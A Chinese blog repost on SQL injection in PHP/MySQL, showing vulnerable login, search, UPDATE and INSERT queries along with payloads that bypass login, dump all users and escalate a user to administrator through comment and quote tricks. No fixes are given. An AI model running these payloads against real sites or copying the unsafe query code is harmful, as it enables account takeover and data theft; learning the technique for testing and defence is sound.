看看你写的sql是不是强壮

2024-06-19 05:32
文章标签 sql 强壮 是不是 看看 database

本文主要是介绍看看你写的sql是不是强壮,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

  • SQL注入实例


    1.select语句

    通常我们在用户登陆的时候,SQL语句如此写法:

    $sql=select * from users where userName='{$_POST['unm']} '

  • 主要是用来检查这个用户是否存在,
  • 如果说我在用户名一栏填上: 1=1 or 1='1'


    那么sql语句就变成了:

    select * from users where userName=1=1 or 1='1';

    你填上去试试看?可以轻松绕过验证,同样密码在输入的时候也可以如此做法

  • 还可以如此填法:%1,或者*1,,只要以通配符开头都可以绕过验证
  • 2.通配符
  • <form method=“POST” action=“<? echo $PHP_SELF; ?>“>


    <input type=“text” name=“search”><br>

    <input type=“submit” value=“Search”>

    </form>

    <?php

    ………

    SELECT * FROM users WHERE username LIKE ‘%$search%’ ORDER BY username

    …….

    ?>

  • ’%’ 就是通配符,其它的通配符还有’*’和’_’,其中" * "用来匹配字段名,而" % "用来匹配字段值,注意的是%必须与like一起适用,还有一个通配符,就是下划线" _ ",它代表的意思和上面不同,是用来匹配任何单个的字符的。在上面的代码中我们用到了’*’表示返回的所有字段名,%$search%表示所有包含$search字符的内容。


  • 在表单里提交

    Aabb%’ or 1=1 order by id#

    注:#在mysql中表示注释的意思,即让后面的sql语句不执行,后面将讲到。

    或许有人会问为什么要用or 1=1呢,看下面,

    把提交的内容带入到sql语句中成为

  • SELECT * FROM users WHERE username LIKE ‘%aabb%’ or 1=1 order by id# ORDER BY username
  • 假如没有含有aabb的用户名,那么or 1=1使返回值仍为真,使能返回所有值


    我们还可以这样

    在表单里提交

    %’ order by id#

    或者

    ’ order by id#

    带入sql语句中成了

    SELECT * FROM users WHERE username LIKE ‘% %’ order by id# ORDER BY username

    SELECT * FROM users WHERE username LIKE ‘%%’ order by id# ORDER BY username

    当然了,内容全部返回。

    列出所有用户了哟,没准连密码都出来哩。

    3.update

    我们先给出表的结构,这样大家看的明白

    CREATE TABLE users (

    id int(10) NOT NULL auto_increment,

    login varchar(25),

    password varchar(25),

    email varchar(30),

    userlevel tinyint,

    PRIMARY KEY (id)

    )

    其中userlevel表示等级,1为管理员,2为普通用户

    <?php

    //change.php

    ……

    $sql = "UPDATE users SET password='$pass', email='$email' WHERE id='$id'"

    ……

    ?>

    Ok,我们开始注入了哦,在添email的地方我们添入

    netsh@163.com’,userlevel=’1

    sql语句执行的就是

    UPDATE users SET password='youpass',

    [email]email='netsh@163.com’,userlevel=’1’[/email] WHERE id='youid’

    看看我们的userlevel就是1了,变成管理员了哟

    哈哈,如此之爽,简直是居家旅行必备啊。

    这里我们简单提一下单引号闭合的问题,如果只用了一个单引号而没有单引号与之组成一对,系统会返回错误。列类型主要分为数字类型,日期和时间类型,字符串类型,然而引号一般用在字符串类型里,而在数字类型里一般人都不会用到引号(然而却是可以用的,而且威力很大),日期和时间类型就很少用于注入了(因为很少有提交时间变量的)


  • 4.insert

  • 看看表的结构先


    CREATE TABLE membres (

    id varchar(15) NOT NULL default '',

    login varchar(25),

    password varchar(25),

    email varchar(30),

    userlevel tinyint,

    PRIMARY KEY (id)

    )

    我们仍然假设userlevel表示用户等级,1为管理者,2为普通用户哈。

    代码如下

    <?php

    //reg.php

    ……

    $query = "INSERT INTO members VALUES('$id','$login','$pass','$email',’2')" ;

    ……

    ?>

    默认插入用户等级是2

    现在我们构建注入语句了哦

    还是在要我们输入email的地方输入:

    netsh@163.com’,’1’)#

    sql语句执行时变成了:

    INSERT INTO membres VALUES ('youid','youname','youpass',' netsh@163.com’,’1’)#',?')

    看我们一注册就是管理员了。

    #号表示什么来着,不是忘了吧,晕了,这么快?

    忘就忘了吧,下面再详细给你说说

    5.mysql中的注释

    这个是很重要的,大家可不能再睡觉啦,要是再睡觉到期末考试的时候就挂了你们。

    我们继续

    相信大家在上面的几个例子中已经看到注释的强大作用了吧,这里我们将再详细介绍一下。

    Mysql有3种注释句法

    # 注射掉注释符后面的本行内容

    -- 注射效果同#

    /* ... */  注释掉符号中间的部分

    对于#号将是我们最常用的注释方法。

    -- 号记得后面还得有一个空格才能起注释作用。

    /*…*/  我们一般只用前面的/*就够了,因为后面的我们想加也不行,是吧?

    注意:在浏览器地址栏输入#时应把它写成%23,这样经urlencode转换后才能成为#,从而起到注释的作用。#号在浏览器的地址框中输入的话可什么也不是哦。

    为了大家深刻理解

    这里我给大家来个例题

    有如下的管理员信息表

  • CREATE TABLE alphaauthor (


       Id tinyint(4) NOT NULL auto_increment,

       UserName varchar(50) NOT NULL default '',

       PASSWORD varchar(50) default NULL,

       Name varchar(50) default NULL,

       PRIMARY KEY  (Id),

       UNIQUE KEY Id (Id),

       KEY Id_2 (Id)

    )

  • <?php


    //Login.php

    ……

    $query="select * from alphaauthor where UserName='$username' and Password='$passwd'";

    $result=mysql_query($query);

    $data=mysql_fetch_array($result);

    if ($data)

         {

         Echo “重要信息”;

         }

         Else

         Echo “登陆失败”;

    ……

    ?>

  • 我们在浏览器地址框直接输入


    http://***/login.php?username=a’or id=1 %23

    %23转换成#了

    放到sql语句中

    select * from alphaauthor where UserName='a’or id=1 #' and Password='$passwd'

    #号后面的都拜输入了,看看

    这句话等价于

    select * from alphaauthor where UserName='a’or id=1

  • 再仔细看看表的结构,只要有id=1的账户,返回的$data就应该为真


    我们就直接登陆了,当然你也可以写

    hppt://***/login.php?username=a’or 1=1 %23

    一样的啦


  • 原文地址:http://bbs.lampbrother.net/read-htm-tid-152156.html

    <script type=text/javascript charset=utf-8 src="http://static.bshare.cn/b/buttonLite.js#style=-1&uuid=&pophcol=3&lang=zh"></script> <script type=text/javascript charset=utf-8 src="http://static.bshare.cn/b/bshareC0.js"></script>
    阅读(7) | 评论(0) | 转发(0) |
    0

    上一篇:知识总结——JAVA面向对象

    下一篇:常用数组创建函数----自己练手呢!

    相关热门文章
    • 欲说还休梦已阑
    • 纪念日的独白
    • 淘富阁开店推广秘籍
    • 太阳城开户
    • 1.76金币传奇新开区最好还是低...
    • phpStudy 2013下载,PHP5开发...
    • 草和谐榴社区caoliushequ...
    • 灵芝的种类和图片
    • 为PHP添加GD库支持
    • 秋天的惆怅
    • 大家都是用什么来管理hadoop集...
    • 网站被人挂了吗,添加了些程序...
    • Nginx如何保证不走宕机的那个...
    • 大家谈谈MYSQL客户端和服务器...
    • 以下代码运行后为何会输出5?...
    给主人留下些什么吧!~~
    评论热议

这篇关于看看你写的sql是不是强壮的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/1074142

相关文章

mysql索引四(组合索引)

mysql索引四(组合索引)

单列索引,即一个索引只包含单个列,一个表可以有多个单列索引,但这不是组合索引;组合索引,即一个索引包含多个列。 因为有事,下面内容全部转自:https://www.cnblogs.com/farmer-cabbage/p/5793589.html 为了形象地对比单列索引和组合索引,为表添加多个字段:    CREATE TABLE mytable( ID INT NOT NULL, use
阅读更多...
mysql索引三(全文索引)

mysql索引三(全文索引)

前面分别介绍了mysql索引一(普通索引)、mysql索引二(唯一索引)。 本文学习mysql全文索引。 全文索引(也称全文检索)是目前搜索引擎使用的一种关键技术。它能够利用【分词技术】等多种算法智能分析出文本文字中关键词的频率和重要性,然后按照一定的算法规则智能地筛选出我们想要的搜索结果。 在MySql中,创建全文索引相对比较简单。例如:我们有一个文章表(article),其中有主键ID(
阅读更多...
mysql索引二(唯一索引)

mysql索引二(唯一索引)

前文中介绍了MySQL中普通索引用法,和没有索引的区别。mysql索引一(普通索引) 下面学习一下唯一索引。 创建唯一索引的目的不是为了提高访问速度,而只是为了避免数据出现重复。唯一索引可以有多个但索引列的值必须唯一,索引列的值允许有空值。如果能确定某个数据列将只包含彼此各不相同的值,在为这个数据列创建索引的时候就应该使用关键字UNIQUE,把它定义为一个唯一索引。 添加数据库唯一索引的几种
阅读更多...
mysql索引一(普通索引)

mysql索引一(普通索引)

mysql的索引分为两大类,聚簇索引、非聚簇索引。聚簇索引是按照数据存放的物理位置为顺序的,而非聚簇索引则不同。聚簇索引能够提高多行检索的速度、非聚簇索引则对单行检索的速度很快。         在这两大类的索引类型下,还可以降索引分为4个小类型:         1,普通索引:最基本的索引,没有任何限制,是我们经常使用到的索引。         2,唯一索引:与普通索引
阅读更多...
【服务器运维】MySQL数据存储至数据盘

【服务器运维】MySQL数据存储至数据盘

查看磁盘及分区 [root@MySQL tmp]# fdisk -lDisk /dev/sda: 21.5 GB, 21474836480 bytes255 heads, 63 sectors/track, 2610 cylindersUnits = cylinders of 16065 * 512 = 8225280 bytesSector size (logical/physical)
阅读更多...
SQL Server中,查询数据库中有多少个表,以及数据库其余类型数据统计查询

SQL Server中,查询数据库中有多少个表,以及数据库其余类型数据统计查询

sqlserver查询数据库中有多少个表 sql server 数表:select count(1) from sysobjects where xtype='U'数视图:select count(1) from sysobjects where xtype='V'数存储过程select count(1) from sysobjects where xtype='P' SE
阅读更多...
SQL Server中,always on服务器的相关操作

SQL Server中,always on服务器的相关操作

在SQL Server中,建立了always on服务,可用于数据库的同步备份,当数据库出现问题后,always on服务会自动切换主从服务器。 例如192.168.1.10为主服务器,12为从服务器,当主服务器出现问题后,always on自动将主服务器切换为12,保证数据库正常访问。 对于always on服务器有如下操作: 1、切换主从服务器:假如需要手动切换主从服务器时(如果两个服务
阅读更多...
SQL Server中,isnull()函数以及null的用法

SQL Server中,isnull()函数以及null的用法

SQL Serve中的isnull()函数:          isnull(value1,value2)         1、value1与value2的数据类型必须一致。         2、如果value1的值不为null,结果返回value1。         3、如果value1为null,结果返回vaule2的值。vaule2是你设定的值。        如
阅读更多...
SQL Server中,添加数据库到AlwaysOn高可用性组条件

SQL Server中,添加数据库到AlwaysOn高可用性组条件

1、将数据添加到AlwaysOn高可用性组,需要满足以下条件: 2、更多具体AlwaysOn设置,参考:https://msdn.microsoft.com/zh-cn/library/windows/apps/ff878487(v=sql.120).aspx 注:上述资源来自MSDN。
阅读更多...
SQL Server中,用Restore DataBase把数据库还原到指定的路径

SQL Server中,用Restore DataBase把数据库还原到指定的路径

restore database 数据库名 from disk='备份文件路径' with move '数据库文件名' to '数据库文件放置路径', move '日志文件名' to '日志文件存放置路径' Go 如: restore database EaseWe from disk='H:\EaseWe.bak' with move 'Ease
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2